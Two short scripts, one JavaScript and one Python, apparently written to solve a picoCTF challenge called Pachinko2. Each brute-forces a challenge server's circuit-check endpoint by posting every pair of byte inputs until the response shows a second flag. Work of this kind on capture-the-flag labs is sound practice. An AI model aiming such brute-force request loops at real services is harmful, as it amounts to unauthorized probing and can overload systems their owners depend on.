File: Pachinko2/server/wx_ploit/brute.js
const axios = require('axios');
const baseURL = 'http://activist-birds.picoctf.net:54131/check';  // Replace with the actual URL

const tryCircuit = async (input1, input2) => {
    try {
        const response = await axios.post(baseURL, {
            circuit: [
                { input1, input2, output: input1 ^ input2 }
            ]
        });

        console.log(`Tried: input1 = ${input1}, input2 = ${input2} -> ${response.data.flag}`);
        if (response.data.flag.includes("FLAG2")) {
            console.log("Flag 2 Found!");
            process.exit();
        }
    } catch (error) {
        console.error("Request failed", error);
    }
};

const bruteForce = async () => {
    for (let input1 = 1; input1 <= 255; input1++) {
        for (let input2 = 1; input2 <= 255; input2++) {
            await tryCircuit(input1, input2);
        }
    }
};

bruteForce();

File: Pachinko2/server/wx_ploit/brute.py
import requests
import json

# Set up the API endpoint
url = 'http://activist-birds.picoctf.net:54131/check'

# Example function to test different circuit combinations
def try_circuit(input1, input2, output):
    circuit = [{"input1": input1, "input2": input2, "output": output}]
    payload = {"circuit": circuit}
    headers = {'Content-Type': 'application/json'}

    response = requests.post(url, data=json.dumps(payload), headers=headers)
    
    if response.status_code == 200:
        result = response.json()
        print(f"Success! Response: {result}")
        return result
    else:
        print(f"Failed to submit circuit with input1={input1}, input2={input2}, output={output}")
        return None

# Brute-force approach: Test different combinations of inputs/outputs
for input1 in range(0, 256, 1):  # Testing all possible values for input1 (0-255)
    for input2 in range(0, 256, 1):  # Testing all possible values for input2 (0-255)
        output = 255  # We are setting output to 255, which might trigger the flag
        result = try_circuit(input1, input2, output)
        if result and "flag" in result['status'].lower() and 'flag2' in result['flag'].lower():
            print("Found Flag 2!")
            break
